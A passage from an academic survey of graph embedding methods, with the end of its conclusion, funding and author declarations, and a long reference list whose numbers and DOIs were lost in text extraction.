full-size doi: . /peerj-cs. /fig- makarov et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ dramatically the final quality of the model. so, the understanding and further developing of coarsening and sampling techniques is the promising direction. one of the most popular technique for graph embedding at the current time is the attention mechanism. it helps to account for some significant properties of a graph like temporality and heterogeneity by introducing attention in different dimensions: time, different levels of edge and nodes types. however, this method could be exhaustive in terms of computation, so it should be used with acceleration techniques. the other research direction that grows rapidly is the stability of graph embeddings. the popular practices are to use variational graph autoencoders with gaussian denoising or adversarial training. the development of scalable and high-quality graph neural networks leads to an increase in the number of applications to the non-graph domain. the most common application of it is the modeling of similarity or nearest neighbors graphs. such approaches are presented in natural language processing, computer vision and recommender systems. however, in many fields, structures could be natively presented as graphs in terms of labels (samples of one type are connected), interaction, knowledge or relation graphs. our survey covers the most complete of methods and application in different computer science domains related to machine learning problems on relational data. in addition, in the experiment part of the study we provide results on training best graph embedding models for node classification, link prediction, node clustering and network visualization tasks for different types of models and graphs to understand why certain graph embedding perform better than others on benchmark datasets under different training settings. our experiments explain how different embeddings work with different properties uncovering graph inner properties and descriptive statistics impact on the models performance. as one of the most interesting findings, we show that structural embeddings with proper objectives achieve competitive quality vs graph neural networks. still, it could be hard to apply such methods to large graphs. firstly, there is a problem with high computational complexity. graph neural networks solve this issue by using batch training and sampling techniques. another problem is that learned structural embeddings for large graphs could be noisy. however, adding the node attributes helps to concentrate on the specific important properties. modern models focus on accounting for node attributes, but it was found that more important question is how to balance a trade-off between node attributes and network structure. our work will be helpful in the further development of such generalization methods to answer this question. such methods will allow to easily apply graph models in different domains. additional information and declarations funding the work of nikita nikitinsky on section was supported by the russian science foundation grant - - . the oa fee was covered under support of faculty of computer science, hse university. the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. makarov et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ grant disclosures the following grant information was disclosed by the authors: russian science foundation: - - . faculty of computer science, hse university. competing interests the authors declare that they have no competing interests. author contributions � ilya makarov conceived and designed the experiments, analyzed the data, performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. � dmitrii kiselev conceived and designed the experiments, performed the experiments, analyzed the data, performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. � nikita nikitinsky conceived and designed the experiments, analyzed the data, authored or reviewed drafts of the paper, and approved the final draft. � lovro subelj conceived and designed the experiments, analyzed the data, authored or reviewed drafts of the paper, and approved the final draft. data availability the following information was supplied regarding data availability: metric evaluation code for each of the presented tasks is available in the supplemental files. supplemental information supplemental information for this article can be found online at http://dx.doi.org/ . / peerj-cs. #supplemental-information. references abdelaziz i, fokoue a, hassanzadeh o, zhang p, sadoghi m. . large-scale structural and textual similarity-based mining of knowledge graph to predict drug-drug interactions. journal of web semantics : – doi . /j.websem. . . . abu-el-haija s, perozzi b, al-rfou r. . learning edge representations via low-rank asymmetric projections. in: proceedings of the acm on conference on information and knowledge management. acm, – . abu-el-haija s, perozzi b, al-rfou r, alemi aa. . watch your step: learning node embeddings via graph attention. in: advances in neural information processing systems. – . adafre sf, de rijke m. . discovering missing links in wikipedia. in: proceedings of the rd international workshop on link discovery, linkkdd ’ . new york: acm, – . adamic la, adar e. . friends and neighbors on the web. social networks ( ): – doi . /s - ( ) - . makarov et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /j.websem. . . http://dx.doi.org/ . /s - ( ) - http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ ahmed a, shervashidze n, narayanamurthy s, josifovski v, smola aj. . distributed large-scale natural graph factorization. in: proceedings of the nd international conference on world wide web. acm, – . akyildiz ta, aljundi aa, kaya k. . gosh: embedding big graphs on small hardware. in: th international conference on parallel processing—icpp, icpp ’ . new york: association for computing machinery. alanis-lobato g, mier p, andrade-navarro ma. . efficient embedding of complex networks to hyperbolic space via their laplacian. scientific reports ( ): doi . /srep . alshahrani m, khan ma, maddouri o, kinjo ar, queralt-rosinach n, hoehndorf r. . neuro-symbolic representation learning on biological knowledge graphs. bioinformatics ( ): – doi . /bioinformatics/btx . as feder t, motwani r. . clique partitions, graph compression, and speeding-up algorithms. in: proceedings of the rd annual acm symposium on the theory of computing. new york: acm, – . atahan akyildiz t, alabsi aljundi a, kaya k. . understanding coarsening for embedding large-scale graphs. arxiv preprint arxiv: . . atwood j, towsley d. . diffusion-convolutional neural networks. in: advances in neural information processing systems. – . azran a. . the rendezvous algorithm: multiclass semi-supervised learning with markov random walks. in: proceedings of the th international conference on machine learning. new york: acm, – . backstrom l, leskovec j. . supervised random walks: predicting and recommending links in social networks. in: proceedings of the fourth acm international conference on web search and data mining, wsdm ’ . new york: acm, – . baldini l, martino a, rizzi a. . exploiting cliques for granular computing-based graph classification. in: international joint conference on neural networks (ijcnn). piscataway: ieee, – . baluja s, seth r, sivakumar d, jing y, yagnik j, kumar s, ravichandran d, aly m. . video suggestion and discovery for youtube: taking random walks through the view graph. in: proceedings of the th international conference on world wide web. new york: acm, – . banerjee s, khapra mm. . graph convolutional network with sequential attention for goal-oriented dialogue systems. transactions of the association for computational linguistics ( ): – doi . /tacl_a_ . barabási a-l, albert r. . emergence of scaling in random networks. science ( ): – doi . /science. . . . barrat a, weigt m. . on the properties of small-world network models. european physical journal b-condensed matter and complex systems ( ): – doi . /s . belkin m, niyogi p. . laplacian eigenmaps and spectral techniques for embedding and clustering. in: advances in nips. cambridge: mit press, – . berg rv d, kipf tn, welling m. . graph convolutional matrix completion. arxiv preprint arxiv: . . bhagat s, cormode g, muthukrishnan s. . node classification in social networks. in: social network data analytics. berlin: springer, – . bhagat s, cormode g, rozenbaum i. . applying link-based classification to label blogs. in: advances in web mining and web usage analysis. berlin: springer, – . makarov et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /srep http://dx.doi.org/ . /bioinformatics/btx https://arxiv.org/abs/ . http://dx.doi.org/ . /tacl_a_ http://dx.doi.org/ . /science. . . http://dx.doi.org/ . /s https://arxiv.org/abs/ . http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ bojcheski a, günnemann s. . adversarial attacks on node embeddings. arxiv preprint arxiv: . . bordes a, glorot x, weston j, bengio y. . joint learning of words and meaning representations for open-text semantic parsing. in: artificial intelligence and statistics. cambridge: pmlr, mit press, – . bordes a, usunier n, garcia-duran a, weston j, yakhnenko o. . translating embeddings for modeling multi-relational data. in: advances in neural information processing systems. cambridge: mit press, – . bordes a, weston j, collobert r, bengio y. . learning structured embeddings of knowledge bases. in: twenty-fifth aaai conference on artificial intelligence. aaai, – . brand m. . continuous nonlinear dimensionality reduction by kernel eigenmaps. in: ijcai. – . brochier r, guille a, velcin j. . global vectors for node representations. arxiv preprint arxiv: . . bronstein mm, bruna j, lecun y, szlam a, vandergheynst p. . geometric deep learning: going beyond euclidean data. ieee signal processing magazine ( ): – doi . /msp. . . bruna j, zaremba w, szlam a, lecun y. . spectral networks and locally connected networks on graphs. arxiv preprint arxiv: . . cai h, zheng vw, chang kc-c. . a comprehensive survey of graph embedding: problems, techniques and applications. arxiv preprint arxiv: . . cao m, ma x, zhu k, xu m, wang c. . heterogeneous information network embedding with convolutional graph attention networks. in: international joint conference on neural networks (ijcnn). piscataway: ieee, – . cao s, lu w, xu q. . grarep: learning graph representations with global structural information. in: proceedings of the th acm international on conference on information and knowledge management. new york: acm, – . cao s, lu w, xu q. . deep neural networks for learning graph representations. in: aaai. – . cavallari s, zheng vw, cai h, chang kc-c, cambria e. . learning community embedding with community detection and node embedding on graphs. in: proceedings of the acm on conference on information and knowledge management. new york: acm, – . Çelikkanat a, malliaros fd. . exponential family graph embeddings. arxiv preprint arxiv: . . chamberlain bp, clough j, deisenroth mp. . neural embeddings of graphs in hyperbolic space. arxiv preprint arxiv: . . chang j, blei d. . relational topic models for document networks. in: artificial intelligence and statistics. – . chang s, han w, tang j, qi g-j, aggarwal cc, huang ts. . heterogeneous network embedding via deep architectures. in: proceedings of the th acm sigkdd international conference on knowledge discovery and data mining. new york: acm, – . chen c, min z, liu y, ma s. a. social attentional memory network: modeling aspect- and friend-level differences in recommendation. in: proceedings of the twelfth acm international conference on web search and data mining. new york: acm, – . makarov et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://arxiv.org/abs/ . https://arxiv.org/abs/ . http://dx.doi.org/ . /msp. . https://arxiv.org/abs/ . https://arxiv.org/abs/ . https://arxiv.org/abs/ . https://arxiv.org/abs/ . http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ chen c-m, chien p-c, lin y-c, tsai m-f, yang y-h. a. exploiting latent social listening representations for music recommendations. in: proceedings of the ninth acm international conference recommender systems poster. – . chen c-m, tsai m-f, lin y-c, yang y-h. a. query-based music recommendations via preference embedding. in: proceedings of the th acm conference on recommender systems. new york: acm, – . chen h, anantharam ar, skiena s. . deepbrowse: similarity-based browsing through large lists. in: international conference on similarity search and applications. berlin: springer, – . chen h, koga h. . gl vec: graph embedding enriched by line graphs with edge features. in: gedeon t, wong kw, lee m, eds. neural information processing. cham: springer international publishing, – . chen h, li x, huang z. . link prediction approach to collaborative filtering. in: proceedings of the th acm/ieee-cs joint conference on digital libraries (jcdl ’ ). new york: acm, – . chen h, perozzi b, al-rfou r, skiena s. a. a tutorial on network embeddings. arxiv preprint arxiv: . . chen h, perozzi b, hu y, skiena s. b. harp: hierarchical representation learning for networks. in: thirty-second aaai conference on artificial intelligence. – . chen j, ma t, xiao c. . fastgcn: fast learning with graph convolutional networks via importance sampling. arxiv preprint arxiv: . . chen j, shi z, wu y, xu x, zheng h. c. link prediction adversarial attack. arxiv preprint arxiv: . . chen j, wu y, lin x, xuan q. b. can adversarial network attack be defended? arxiv preprint arxiv: . . chen j, wu y, xu x, chen y, zheng h, xuan q. e. fast gradient attack on network embedding. arxiv preprint arxiv: . . chen j, zhang a. . hgmf: heterogeneous graph-based fusion for multimodal data with incompleteness. in: proceedings of the th acm sigkdd international conference on knowledge discovery & data mining, kdd ’ . new york: association for computing machinery, – . chen j, zhang q, huang x. b. incorporate group information to enhance network embedding. in: proceedings of the th acm international on conference on information and knowledge management. new york: acm, – . chen j, zhu j, song l. . stochastic training of graph convolutional networks with variance reduction. arxiv preprint arxiv: . . chen m, tsang iw, tan m, cham tj. b. a unified feature selection framework for graph embedding on high dimensional data. ieee transactions on knowledge and data engineering ( ): – doi . /tkde. . . chen t, sun y. . task-guided and path-augmented heterogeneous network embedding for author identification. in: proceedings of the tenth acm international conference on web search and data mining. new york: acm, – . chen y, rohrbach m, yan z, shuicheng y, feng j, kalantidis y. c. graph-based global reasoning networks. in: the ieee conference on computer vision and pattern recognition (cvpr). piscataway: ieee. makarov et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://arxiv.org/abs/ . https://arxiv.org/abs/ . https://arxiv.org/abs/ . https://arxiv.org/abs/ . https://arxiv.org/abs/ . https://arxiv.org/abs/ . http://dx.doi.org/ . /tkde. . http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ chen y, sun k, pu j, xiong z, zhang x. . grapasa: parametric graph embedding via siamese architecture. information sciences : – doi . /j.ins. . . . cheng w, zhang x, guo z, wu y, sullivan pf, wang w. . flexible and robust co-regularized multi-domain graph clustering. in: proceedings of the th acm sigkdd international conference on knowledge discovery and data mining. new york: acm, – . chiang w-l, liu x, si s, li y, bengio s, hsieh c-j. . cluster-gcn: an efficient algorithm for training deep and large graph convolutional networks. in: proceedings of the th acm sigkdd international conference on knowledge discovery & data mining. – . cho h, yu y. . link prediction for interdisciplinary collaboration via co-authorship network. social network analysis and mining ( ): doi . /s - - - . chung fr, graham fc. . spectral graph theory. vol. . rhode island: american mathematical soc. clauset a, moore c, newman me. . hierarchical structure and the prediction of missing links in networks. nature ( ): – doi . /nature . cobanoglu mc, liu c, hu f, oltvai zn, bahar i. . predicting drug-target interactions using probabilistic matrix factorization. journal of chemical information and modeling ( ): – doi . /ci z. crichton g, guo y, pyysalo s, korhonen a. . neural networks for link prediction in realistic biomedical graphs: a multi-dimensional evaluation of graph embedding-based approaches. bmc bioinformatics ( ): doi . /s - - - . cui p, wang x, pei j, zhu w. . a survey on network embedding. ieee transactions on knowledge and data engineering ( ): – doi . /tkde. . . dai h, dai b, song l. . discriminative embeddings of latent variable models for structured data. in: international conference on machine learning. new york: acm, – . dai h, li h, tian t, huang x, wang l, zhu j, song l. . adversarial attack on graph structured data. arxiv preprint arxiv: . . de oliveira mf, levkowitz h. . from visual data exploration to visual data mining: a survey. ieee transactions on visualization and computer graphics ( ): – doi . /tvcg. . . deerwester s, dumais st, furnas gw, landauer tk, harshman r. . indexing by latent semantic analysis. journal of the american society for information science ( ): – doi . /(sici) - ( ) : < ::aid-asi > . .co; - . defferrard m, bresson x, vandergheynst p. . convolutional neural networks on graphs with fast localized spectral filtering. in: advances in neural information processing systems. – . devlin j, chang m-w, lee k, toutanova k. . bert: pre-training of deep bidirectional transformers for language understanding. arxiv preprint arxiv: . . didimo w, liotta g, montecchiani f. . a survey on graph drawing beyond planarity. acm computing surveys ( ): – doi . / . ding ch, he x, zha h, gu m, simon hd. . a min-max cut algorithm for graph partitioning and data clustering. in: proceedings ieee international conference on data mining. piscataway: ieee, – . ding m, tang j, zhang j. . semi-supervised learning on graphs with generative adversarial nets. in: proceedings of the th acm international conference on information and knowledge management. new york: acm, – . makarov et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /j.ins. . . http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /nature http://dx.doi.org/ . /ci z http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /tkde. . https://arxiv.org/abs/ . http://dx.doi.org/ . /tvcg. . http://dx.doi.org/ . /(sici) - ( ) : % c ::aid-asi % e . .co; - https://arxiv.org/abs/ . http://dx.doi.org/ . / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ do dt, le tqt, le nqk. . using deep neural networks and biological subwords to detect protein s-sulfenylation sites. briefings in bioinformatics : doi . /bib/bbaa . dong y, chawla nv, swami a. . metapath vec: scalable representation learning for heterogeneous networks. in: proceedings of the rd acm sigkdd international conference on knowledge discovery and data mining. new york: acm, – . donnat c, holmes s. . tracking network dynamics: a survey using graph distances. annals of applied statistics ( ): – doi . / -aoas . donnat c, zitnik m, hallac d, leskovec j. . learning structural node embeddings via diffusion wavelets. proceedings of the th acm sigkdd international conference on knowledge discovery & data mining : – . duvenaud dk, maclaurin d, iparraguirre j, bombarell r, hirzel t, aspuru-guzik a, adams rp. . convolutional networks on graphs for learning molecular fingerprints. in: advances in neural information processing systems. cambridge: mit press, – . efron b. . bootstrap methods: another look at the jackknife. in: breakthroughs in statistics. berlin: springer international publishing, – . erdös p, rényi a. . on random graphs publ. publicationes mathematicae debrecen : – . ezzat a, wu m, li x-l, kwoh c-k. . drug-target interaction prediction using ensemble learning and dimensionality reduction. methods : – doi . /j.ymeth. . . . ezzat a, zhao p, wu m, li x-l, kwoh c-k. . drug-target interaction prediction with graph regularized matrix factorization. ieee/acm transactions on computational biology and bioinformatics ( ): – doi . /tcbb. . . fan m, zhou q, chang e, zheng tf. . transition-based knowledge graph embedding with relational mapping properties. proceedings of the th pacific asia conference on language, information and computing : – . fang h, wu f, zhao z, duan x, zhuang y, ester m. . community-based question answering via heterogeneous social network learning. in: thirtieth aaai conference on artificial intelligence. – . fathy a, li k. . temporalgat: attention-based dynamic graph representation learning. in: lauw hw, wong rc-w, ntoulas a, lim e-p, ng s-k, pan sj, eds. advances in knowledge discovery and data mining. cham: springer international publishing, – . feng r, yang y, hu w, wu f, zhang y. . representation learning for scale-free networks. in: thirty-second aaai conference on artificial intelligence. fey m, eric lenssen j, weichert f, müller h. . splinecnn: fast geometric deep learning with continuous b-spline kernels. in: proceedings of the ieee conference on computer vision and pattern recognition. piscataway: ieee, – . fortunato s. . community detection in graphs. physics reports ( – ): – doi . /j.physrep. . . . fu x, zhang j, meng z, king i. . magnn: metapath aggregated graph neural network for heterogeneous graph embedding. in: proceedings of the web conference , www ’ . new york: association for computing machinery, – . gallicchio c, micheli a. . fast and deep graph neural networks. in: aaai. – . ganguly s, gupta m, varma v, pudi v. . et al.author vec: learning author representations by combining content and link information. in: proceedings of the th international conference companion on world wide web. – . makarov et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /bib/bbaa http://dx.doi.org/ . / -aoas http://dx.doi.org/ . /j.ymeth. . . http://dx.doi.org/ . /tcbb. . http://dx.doi.org/ . /j.physrep. . . http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ gao f, musial k, cooper c, tsoka s. . link prediction methods and their accuracy for different social networks and network metrics. scientific programming ( ): – doi . / / . gao j, zhang t, xu c. . graph convolutional tracking. in: cvpr. gao s, denoyer l, gallinari p. . temporal link prediction by integrating content and structure information. in: proceedings of the th acm international conference on information and knowledge management, cikm ’ . new york: acm, – . geng x, zhang h, bian j, chua t-s. . learning image and user features for recommendation in social networks. in: proceedings of the ieee international conference on computer vision. piscataway: ieee, – . getoor l, taskar b. . statistical relational learning. https://mitpress.mit.edu/books/ introduction-statistical-relational-learning. gilmer j, schoenholz ss, riley pf, vinyals o, dahl ge. . neural message passing for quantum chemistry. in: proceedings of the th international conference on machine learning-volume . – . golub gh, reinsch c. . singular value decomposition and least squares solutions. in: linear algebra. berlin: springer, – . goyal p, chhetri sr, canedo a. . dyngraph vec: capturing network dynamics using dynamic graph representation learning. knowledge-based systems : doi . /j.knosys. . . . goyal p, ferrara e. . graph embedding techniques, applications, and performance: a survey. arxiv preprint arxiv: . . goyal p, hosseinmardi h, ferrara e, galstyan a. . embedding networks with edge attributes. in: proceedings of the th on hypertext and social media. new york: acm, – . grover a, leskovec j. . node vec: scalable feature learning for networks. proceedings of the nd acm sigkdd ic on kdd : – . gui h, liu j, tao f, jiang m, norick b, han j. . large-scale embedding learning in heterogeneous event data. in: ieee th international conference on data mining (icdm). piscataway: ieee, – . guo z, zhang y, lu w. . attention guided graph convolutional networks for relation extraction. in: proceedings of the th annual meeting of the association for computational linguistics. florence: association for computational linguistics, – . haddad m, bothorel c, lenca p, bedart d. . temporalnode vec: temporal node embedding in temporal networks. in: international conference on complex networks and their applications. berlin: springer international publishing, – . hamilton w, ying z, leskovec j. a. inductive representation learning on large graphs. in: advances in nips. cambridge: mit press, – . hamilton wl, ying r, leskovec j. b. representation learning on graphs: methods and applications. arxiv preprint arxiv: . . hasan ma, zaki mj. . a survey of link prediction in social networks, chapter . boston: springer us, – . hayashi k, ohsaki m. . reinforcement learning and graph embedding for binary truss topology optimization under stress and displacement constraints. frontiers in built environment : doi . /fbuil. . . makarov et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . / / https://arxiv.org/abs/https://mitpress.mit.edu/books/introduction-statistical-relational-learning https://arxiv.org/abs/https://mitpress.mit.edu/books/introduction-statistical-relational-learning http://dx.doi.org/ . /j.knosys. . . https://arxiv.org/abs/ . https://arxiv.org/abs/ . http://dx.doi.org/ . /fbuil. . http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ he q, pei j, kifer d, mitra p, giles l. . context-aware citation recommendation. in: proceedings of the th international conference on world wide web, www ’ . new york: acm, – . he s, liu k, ji g, zhao j. . learning to represent knowledge graphs with gaussian embedding. proceedings of the th acm international on conference on information and knowledge management : – . he x, niyogi p. . locality preserving projections. in: advances in neural information processing systems. – . heckerman d, meek c, koller d. . probabilistic entity-relationship models, prms, and plate models. in: introduction to statistical relational learning. – . henaff m, bruna j, lecun y. . deep convolutional networks on graph-structured data. arxiv preprint arxiv: . . herman i, melançon g, marshall ms. . graph visualization and navigation in information visualization: a survey. ieee transactions on visualization and computer graphics ( ): – doi . / . . hettige b, wang w, li y-f, buntine w. . robust attribute and structure preserving graph embedding. in: pacific-asia conference on knowledge discovery and data mining. berlin: springer, – . hong h, lin y, yang x, li z, fu k, wang z, qie x, ye j. . heteta: heterogeneous information network embedding for estimating time of arrival. in: proceedings of the th acm sigkdd international conference on knowledge discovery & data mining, kdd ’ . new york: association for computing machinery, – . hou c, nie f, tao h, yi d. . multi-view unsupervised feature selection with adaptive similarity and view weight. ieee transactions on knowledge and data engineering ( ): – doi . /tkde. . . hu b, fang y, shi c. . adversarial learning on heterogeneous information networks. in: proceedings of the th acm sigkdd international conference on knowledge discovery & data mining, kdd ‘ . new york: association for computing machinery, – . huang x, li j, hu x. . label informed attributed network embedding. in: proceedings of the tenth acm international conference on web search and data mining. new york: acm, – . huang x, zhang j, li d, li p. . knowledge graph embedding based question answering. in: proceedings of the twelfth acm international conference on web search and data mining. new york: acm. vol. . – . huang z, mamoulis n. . heterogeneous information network embedding for meta path based proximity. arxiv preprint arxiv: . . islam mr, prakash ba, ramakrishnan n. . signet: scalable embeddings for signed networks. in: pacific-asia conference on knowledge discovery and data mining. berlin: springer international publishing, – . jacob y, denoyer l, gallinari p. . learning latent representations of nodes for classifying in heterogeneous social networks. in: proceedings of the th acm international conference on web search and data mining. new york: acm, – . jenatton r, roux nl, bordes a, obozinski gr. . a latent factor model for highly multi-relational data. in: advances in neural information processing systems. cambridge: mit press, – . ji g, he s, xu l, liu k, zhao j. . knowledge graph embedding via dynamic mapping matrix. in: proceedings of the rd annual meeting of the association for computational linguistics makarov et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://arxiv.org/abs/ . http://dx.doi.org/ . / . http://dx.doi.org/ . /tkde. . https://arxiv.org/abs/ . http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ and the th international joint conference on natural language processing (volume : long papers), volume . – . ji g, liu k, he s, zhao j. . knowledge graph completion with adaptive sparse transfer matrix. in: thirtieth aaai conference on artificial intelligence. new york: aaai, . jiang z, gao z, lan j, yang h, lu y, liu x. . task-oriented genetic activation for large-scale complex heterogeneous graph embedding. in: proceedings of the web conference , www ’ . new york: association for computing machinery, – . jing y, wang h, shao k, huo x, zhang y. . unsupervised graph representation learning with variable heat kernel. ieee access : – doi . /access. . . johansson fd, dubhashi d. . learning with similarity functions on graphs using matchings of geometric embeddings. in: proceedings of the th acm sigkdd international conference on knowledge discovery and data mining. new york: acm, – . kearnes s, mccloskey k, berndl m, pande v, riley p. . molecular graph convolutions: moving beyond fingerprints. journal of computer-aided molecular design ( ): – doi . /s - - - . kefato zt, sheikh n, montresor a. . which way? direction-aware attributed graph embedding. arxiv preprint arxiv: . . keser r, nallbani i, calik n, ayanzadeh a, töreyin b. . graph embedding for link prediction using residual variational graph autoencoders. in: the th ieee conference on signal processing and communications applications. piscataway: ieee. khalil e, dai h, zhang y, dilkina b, song l. . learning combinatorial optimization algorithms over graphs. in: advances in neural information processing systems. – . khasahmadi ah, hassani k, moradi p, lee l, morris q. . memory-based graph networks. in: international conference on learning representations.. kim d, kim s, kwak n. . textbook question answering with knowledge graph understanding and unsupervised open-set text comprehension. arxiv preprint arxiv: . . kim j, kim t, kim s, yoo cd. . edge-labeling graph neural network for few-shot learning. arxiv preprint arxiv: . . kim j, park h, lee j-e, kang u. . side: representation learning in signed directed networks. in: proceedings of the world wide web conference, www ’ . republic and canton of geneva, che: international world wide web conferences steering committee, – . kingma dp, welling m. . auto-encoding variational bayes. arxiv preprint arxiv: . . kipf tn, welling m. a. semi-supervised classification with graph convolutional networks. arxiv preprint arxiv: . . kipf tn, welling m. b. variational graph auto-encoders. arxiv preprint arxiv: . . kleinberg r. . geographic routing using hyperbolic space. in: ieee infocom - th ieee international conference on computer communications. piscataway: ieee, – . kolouri s, naderializadeh n, rohde gk, hoffmann h. . wasserstein embedding for graph learning. arxiv preprint arxiv: . . kong x, mao m, wang w, liu j, xu b. . voprec: vector representation learning of papers with text information and structural identity for recommendation. in: ieee transactions on emerging topics in computing.. krioukov d, papadopoulos f, boguñá m, vahdat a. . greedy forwarding in scale-free networks embedded in hyperbolic metric spaces. acm sigmetrics performance evaluation review ( ): – doi . / . . kruskal j, wish m. . multidimensional scaling. new york: sage publications. makarov et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /access. . http://dx.doi.org/ . /s - - - https://arxiv.org/abs/ . https://arxiv.org/abs/ . https://arxiv.org/abs/ . https://arxiv.org/abs/ . https://arxiv.org/abs/ . https://arxiv.org/abs/ . https://arxiv.org/abs/ . http://dx.doi.org/ . / . http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ kulmanov m, khan ma, hoehndorf r. . deepgo: predicting protein functions from sequence and interactions using a deep ontology-aware classifier. bioinformatics ( ): – doi . /bioinformatics/btx . laakom f, raitoharju j, passalis n, iosifidis a, gabbouj m. . graph embedding with data uncertainty. arxiv preprint arxiv: . . le nqk, yapp eky, yeh h-y. . et-gru: using multi-layer gated recurrent units to identify electron transport proteins. bmc bioinformatics ( ): doi . /s - - - . le tm, lauw hw. . probabilistic latent document network embedding. in: ieee international conference on data mining (icdm). piscataway: ieee, – . lee jb, rossi r, kong x. . graph classification using structural attention. in: proceedings of the th acm sigkdd international conference on knowledge discovery & data mining. new york: acm, – . lee jb, rossi ra, kim s, ahmed nk, koh e. . attention models in graphs: a survey. acm transactions on knowledge discovery from data ( ): – doi . / . lei m, shi y, niu l. . the applications of stochastic models in network embedding: a survey. in: ieee/wic/acm international conference on web intelligence (wi). piscataway: ieee, – . leskovec j, huttenlocher d, kleinberg j. . signed networks in social media. in: proceedings of the sigchi conference on human factors in computing systems, chi ’ . new york: association for computing machinery, – . levie r, monti f, bresson x, bronstein mm. . cayleynets: graph convolutional neural networks with complex rational spectral filters. ieee transactions on signal processing ( ): – doi . /tsp. . . li b, pi d, lin y, khan ia, cui l. a. multi-source information fusion based heterogeneous network embedding. information sciences : – doi . /j.ins. . . . li g, luo j, xiao q, liang c, ding p, cao b. a. predicting microrna-disease associations using network topological similarity based on deepwalk. ieee access : – doi . /access. . . li j, chen c, tong h, liu h. . multi-layered network embedding. in: proceedings of the siam international conference on data mining. siam, – . li j, ritter a, jurafsky d. . learning multi-faceted representations of individuals from heterogeneous evidence using neural networks. arxiv preprint arxiv: . . li j, zhu j, zhang b. . discriminative deep random walk for network classification. in: proceedings of the th annual meeting of the association for computational linguistics (volume : long papers), volume . – . li k, gao j, guo s, du n, li x, zhang a. a. lrbm: a restricted boltzmann machine based approach for representation learning on linked data. in: ieee international conference on data mining. piscataway: ieee, – . li m, chen s, chen x, zhang y, wang y, tian q. a. actional-structural graph convolutional networks for skeleton-based action recognition. in: the ieee conference on computer vision and pattern recognition (cvpr). piscataway: ieee. li q, shang y, qiao x, dai w. b. heterogeneous dynamic graph attention network. in: ieee international conference on knowledge graph (ickg). piscataway: ieee, – . li w, xu j, he y, yan s, wu y, sun x. b. coherent comments generation for chinese articles with a graph-to-sequence model. in: proceedings of the th annual meeting of the association for computational linguistics. florence: association for computational linguistics, – . makarov et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /bioinformatics/btx https://arxiv.org/abs/ . http://dx.doi.org/ . /s - - - http://dx.doi.org/ . / http://dx.doi.org/ . /tsp. . http://dx.doi.org/ . /j.ins. . . http://dx.doi.org/ . /access. . https://arxiv.org/abs/ . http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ li x, chen h. . recommendation as link prediction: a graph kernel-based machine learning approach. in: proceedings of the th acm/ieee-cs joint conference on digital libraries, jcdl ’ . new york: acm, – . li x, chen w, chen y, zhang x, gu j, zhang mq. b. network embedding-based representation learning for single cell rna-seq data. nucleic acids research ( ):e doi . /nar/gkx . li x, du n, li h, li k, gao j, zhang a. b. a deep learning approach to link prediction in dynamic networks. in: proceedings of the siam international conference on data mining. siam, – . li y, nie f, huang h, huang j. b. large-scale multi-view spectral clustering via bipartite graph. in: proceedings of the twenty-ninth aaai conference on artificial intelligence, volume . – . li y, tarlow d, brockschmidt m, zemel r. c. gated graph sequence neural networks. arxiv preprint arxiv: . . li y, yu r, shahabi c, liu y. c. diffusion convolutional recurrent neural network: data-driven traffic forecasting. arxiv preprint arxiv: . . liben-nowell d, kleinberg j. . the link-prediction problem for social networks. journal of the association for information science and technology ( ): – . lim kw, buntine wl. . bibliographic analysis with the citation network topic model. arxiv preprint arxiv: . . lin b, ghaddar b, nathwani j. a. deep reinforcement learning for electric vehicle routing problem with time windows. arxiv preprint arxiv: . . lin y, hou j, laurienti pj, wu g. b. detecting changes of functional connectivity by dynamic graph embedding learning. in: martel al, abolmaesumi p, stoyanov d, mateus d, zuluaga ma, zhou sk, racoceanu d, joskowicz l, eds. medical image computing and computer assisted intervention—miccai . cham: springer international publishing, – . lin y, liu z, sun m, liu y, zhu x. . learning entity and relation embeddings for knowledge graph completion. twenty-ninth aaai conference on artificial intelligence : – . lin y-y, liu t-l, chen h-t. . semantic manifold learning for image retrieval. in: proceedings of the th annual acm international conference on multimedia. new york: acm, – . liu a. . anonymized gcn: a novel robust graph embedding method via hiding node position in noise. arxiv preprint arxiv: . . liu f, liu b, sun c, liu m, wang x. . deep learning approaches for link prediction in social network services. in: international conference on neural information processing. berlin: springer international publishing, – . liu f, liu b, sun c, liu m, wang x. a. deep belief network-based approaches for link prediction in signed social networks. entropy ( ): – doi . /e . liu j, xu c, yin c, wu w, song y. a. k-core based temporal graph convolutional network for dynamic graphs. arxiv preprint arxiv: . . liu l, cheung wk, li x, liao l. . aligning users across social networks using network embedding. in: ijcai. – . liu r, cheng w, tong h, wang w, zhang x. b. robust multi-network clustering via joint cross-domain cluster alignment. in: 